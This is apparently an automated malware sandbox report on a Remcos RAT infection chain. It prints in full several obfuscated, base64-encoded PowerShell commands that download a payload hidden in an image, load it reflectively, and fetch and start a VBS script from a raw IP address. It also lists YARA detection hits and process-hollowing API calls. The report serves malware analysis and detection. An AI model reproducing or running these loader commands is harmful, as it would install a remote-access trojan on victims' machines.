'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )"
                      Source: C:\Windows\SysWOW64\mshta.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\sysTEM32\WInDOwSpoWershELL\v1.0\pOWERSHELl.EXE" "pOweRSHell.eXE -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.Exe ; ieX($(iEx('[sYstem.teXT.EnCodiNg]'+[CHaR]0X3A+[ChAr]0X3a+'utf8.geTStRIng([SYSTem.conVeRT]'+[cHar]0X3a+[cHAr]0x3a+'fRoMbAse64STRINg('+[chAr]0x22+'JFo4ViAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgPSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgYURELXRZcGUgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1tRU1CRVJERWZJTmlUaW9uICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAnW0RsbEltcG9ydCgidVJMTU9OLmRMTCIsICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBDaGFyU2V0ID0gQ2hhclNldC5Vbmljb2RlKV1wdWJsaWMgc3RhdGljIGV4dGVybiBJbnRQdHIgVVJMRG93bmxvYWRUb0ZpbGUoSW50UHRyICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBrRlJJT2lCTCxzdHJpbmcgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIG9DWWksc3RyaW5nICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBvcUxvWVAsdWludCAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgTUR1anZLSyxJbnRQdHIgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIENJWW9nV3RNZXIpOycgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgIC1OYW1FICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAicXJVa0NtTXZhTkgiICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAtbmFNZVNwQUNFICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICBYZEJMQnd6U21nZSAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgLVBhc3NUaHJ1OyAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgJFo4Vjo6VVJMRG93bmxvYWRUb0ZpbGUoMCwiaHR0cDovLzEwNy4xNzUuMjI5LjEzOC81NTAvc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhbHdheXMudElGIiwiJEVudjpBUFBEQVRBXHNlZXRoZWJlc3RwaWN0dXJld2l0aGdyZWF0dGhpbmdzaW5saW5lYS52YlMiLDAsMCk7c1RhcnQtU0xFZVAoMyk7U3RhclQgICAgICAgICAgICAgICAgICAgICAgICAgICAgICAgICIkZW52OkFQUERBVEFcc2VldGhlYmVzdHBpY3R1cmV3aXRoZ3JlYXR0aGluZ3NpbmxpbmVhLnZiUyI='+[char]34+'))')))"Jump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -eX ByPASS -nOp -W 1 -C DeviCEcreDentIALDePLoymENt.ExeJump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -windowstyle hidden -executionpolicy bypass -NoProfile -command ".( $ShELLId[1]+$shElLID[13]+'X')( (('{1}imageUrl = {0}https://raw.githubusercontent.com/CryptersAndToolsOf'+'icial/ZIP/refs/heads/main/DetahNote_V.jpg {0};{1}webClient = New-Object System.Net.WebClient;{'+'1}imageBytes = {1}'+'webClient.Do'+'wnloadData({1}imageUrl);{1}imageText = [S'+'ystem.Text.Enco'+'ding]::UTF8.GetString({1}imageBytes);{1}startFlag = {0}<<BASE64_START'+'>>{0};{1}endFlag = {0}<<BASE64_END>>{0};{1}startIndex = {1}imageText.IndexOf({1}startFlag);{1}endIndex = {1}i'+'mageText.Inde'+'x'+'Of({1}en'+'dFlag);{1}startIndex -ge 0 -and {1}endIndex -g'+'t'+' {1}s'+'tartIndex;{1}startIndex += {1}startFlag.Length;{1}base64Length = {1}endIndex - {1}startIndex;{1}base64Command = {1}imageText.Substring({1}startIndex, {1}base64Length);{1}commandBytes = [System.Convert]::FromBase64String('+'{1}base64Command);{1}loadedAssembly = [System.Reflection.Assembly]'+'::Load({1}commandBytes)'+';{1}vaiMethod = [dnl'+'ib.IO.Home].GetMethod({0}VAI{0});{1}vaiMethod.Invoke({1}null, @({0}txt.RDCCNM/055/831.922.571.701//:ptth{0}, {0}des'+'ativado{0}, {0}desativado{0'+'}, {0}desativado{0}, {0}RegAsm'+'{0}, {0}desativado{0}, {0}desativado{0}));') -F[chAR]39,[chAR]36) )"Jump to behavior
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 11.2.RegAsm.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 9.2.powershell.exe.6605ba0.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 9.2.powershell.exe.6605ba0.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 9.2.powershell.exe.6605ba0.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 11.2.RegAsm.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 9.2.powershell.exe.6605ba0.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 9.2.powershell.exe.6605ba0.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
                      Source: 0000000B.00000002.4541258966.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
                      Source: 00000009.00000002.2362329745.0000000005F9A000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: 00000009.00000002.2362329745.000000000619E000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 1732, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTRMatched rule: Detects Invoke-Mimikatz String Author: Florian Roth
                      Source: Process Memory Space: powershell.exe PID: 1476, type: MEMORYSTRMatched rule: Detects PowerShell scripts containing patterns of base64 encoded files, concatenation and execution Author: ditekSHen
                      Source: Process Memory Space: RegAsm.exe PID: 5940, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
                      Source: C:\Windows\SysWOW64\wscript.exeCOM Object queried: Windows Script Host Shell Object HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{72C24DD5-D70A-438B-8A42-98424B88AFB8}Jump to behavior
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxD
                      Source: C:\Windows\SysWOW64\wscript.exeProcess created: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe "C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -command $Codigo = 'LiggJFNoRUxMSWRbMV0rJHNoRWxMSURbMTNdKydYJykoICgoJ3sxfWltYWdlVXJsID0gezB9aHR0cHM6Ly9yYXcuZ2l0aHVidXNlcmNvbnRlbnQuY29tL0NyeXB0ZXJzQW5kVG9vbHNPZicrJ2ljaWFsL1pJUC9yZWZzL2hlYWRzL21haW4vRGV0YWhOb3RlX1YuanBnIHswfTt7MX13ZWJDbGllbnQgPSBOZXctT2JqZWN0IFN5c3RlbS5OZXQuV2ViQ2xpZW50O3snKycxfWltYWdlQnl0ZXMgPSB7MX0nKyd3ZWJDbGllbnQuRG8nKyd3bmxvYWREYXRhKHsxfWltYWdlVXJsKTt7MX1pbWFnZVRleHQgPSBbUycrJ3lzdGVtLlRleHQuRW5jbycrJ2RpbmddOjpVVEY4LkdldFN0cmluZyh7MX1pbWFnZUJ5dGVzKTt7MX1zdGFydEZsYWcgPSB7MH08PEJBU0U2NF9TVEFSVCcrJz4+ezB9O3sxfWVuZEZsYWcgPSB7MH08PEJBU0U2NF9FTkQ+PnswfTt7MX1zdGFydEluZGV4ID0gezF9aW1hZ2VUZXh0LkluZGV4T2YoezF9c3RhcnRGbGFnKTt7MX1lbmRJbmRleCA9IHsxfWknKydtYWdlVGV4dC5JbmRlJysneCcrJ09mKHsxfWVuJysnZEZsYWcpO3sxfXN0YXJ0SW5kZXggLWdlIDAgLWFuZCB7MX1lbmRJbmRleCAtZycrJ3QnKycgezF9cycrJ3RhcnRJbmRleDt7MX1zdGFydEluZGV4ICs9IHsxfXN0YXJ0RmxhZy5MZW5ndGg7ezF9YmFzZTY0TGVuZ3RoID0gezF9ZW5kSW5kZXggLSB7MX1zdGFydEluZGV4O3sxfWJhc2U2NENvbW1hbmQgPSB7MX1pbWFnZVRleHQuU3Vic3RyaW5nKHsxfXN0YXJ0SW5kZXgsIHsxfWJhc2U2NExlbmd0aCk7ezF9Y29tbWFuZEJ5dGVzID0gW1N5c3RlbS5Db252ZXJ0XTo6RnJvbUJhc2U2NFN0cmluZygnKyd7MX1iYXNlNjRDb21tYW5kKTt7MX1sb2FkZWRBc3NlbWJseSA9IFtTeXN0ZW0uUmVmbGVjdGlvbi5Bc3NlbWJseV0nKyc6OkxvYWQoezF9Y29tbWFuZEJ5dGVzKScrJzt7MX12YWlNZXRob2QgPSBbZG5sJysnaWIuSU8uSG9tZV0uR2V0TWV0aG9kKHswfVZBSXswfSk7ezF9dmFpTWV0aG9kLkludm9rZSh7MX1udWxsLCBAKHswfXR4dC5SRENDTk0vMDU1LzgzMS45MjIuNTcxLjcwMS8vOnB0dGh7MH0sIHswfWRlcycrJ2F0aXZhZG97MH0sIHswfWRlc2F0aXZhZG97MCcrJ30sIHswfWRlc2F0aXZhZG97MH0sIHswfVJlZ0FzbScrJ3swfSwgezB9ZGVzYXRpdmFkb3swfSwgezB9ZGVzYXRpdmFkb3swfSkpOycpICAtRltjaEFSXTM5LFtjaEFSXTM2KSAp';$OWjuxd = [system.Text.encoding]::UTF8.GetString([system.Convert]::Frombase64String($codigo));powershell.exe -windowstyle hidden -executionpolicy bypass -NoProfile -command $OWjuxDJump to behavior
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeProcess Stats: CPU usage > 49%
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041812A GetProcAddress,GetModuleHandleA,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,GetModuleHandleA,GetProcAddress,CreateProcessW,VirtualAlloc,Wow64GetThreadContext,ReadProcessMemory,NtCreateSection,NtUnmapViewOfSection,NtMapViewOfSection,VirtualFree,NtClose,TerminateProcess,GetModuleHandleA,GetProcAddress,GetCurrentProcess,NtMapViewOfSection,WriteProcessMemory,Wow64SetThreadContext,ResumeThread,VirtualFree,GetCurrentProcess,NtUnmapViewOfSection,NtClose,TerminateProcess,GetLastError,11_2_0041812A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041330D OpenProcess,NtQueryInformationProcess,GetCurrentProcess,DuplicateHandle,GetFinalPathNameByHandleW,CloseHandle,CreateFileMappingW,MapViewOfFile,GetFileSize,UnmapViewOfFile,CloseHandle,CloseHandle,CloseHandle,11_2_0041330D
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041BBC6 OpenProcess,NtResumeProcess,CloseHandle,11_2_0041BBC6
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041BB9A OpenProcess,NtSuspendProcess,CloseHandle,11_2_0041BB9A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_0040DD85 memset,CreateFileW,NtQuerySystemInformation,CloseHandle,GetCurrentProcessId,_wcsicmp,_wcsicmp,_wcsicmp,OpenProcess,GetCurrentProcess,DuplicateHandle,memset,CloseHandle,_wcsicmp,CloseHandle,13_2_0040DD85
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_00401806 NtdllDefWindowProc_W,13_2_00401806
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 13_2_004018C0 NtdllDefWindowProc_W,13_2_004018C0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004016FD NtdllDefWindowProc_A,16_2_004016FD
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 16_2_004017B7 NtdllDefWindowProc_A,16_2_004017B7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00402CAC NtdllDefWindowProc_A,17_2_00402CAC
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 17_2_00402D66 NtdllDefWindowProc_A,17_2_00402D66
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004167EF ExitWindowsEx,LoadLibraryA,GetProcAddress,11_2_004167EF
                      Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeCode function: 9_2_04E994699_2_04E99469
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043706A11_2_0043706A
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041400511_2_00414005
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043E11C11_2_0043E11C
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004541D911_2_004541D9
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004381E811_2_004381E8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041F18B11_2_0041F18B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044627011_2_00446270
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043E34B11_2_0043E34B
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004533AB11_2_004533AB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0042742E11_2_0042742E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043756611_2_00437566
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043E5A811_2_0043E5A8
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004387F011_2_004387F0
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043797E11_2_0043797E
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_004339D711_2_004339D7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0044DA4911_2_0044DA49
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00427AD711_2_00427AD7
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0041DBF311_2_0041DBF3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00427C4011_2_00427C40
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00437DB311_2_00437DB3
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00435EEB11_2_00435EEB
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_0043DEED11_2_0043DEED
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_00426E9F11_2_00426E9F
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1001719411_2_10017194
                      Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exeCode function: 11_2_1000B5C111_2_1000B5C1
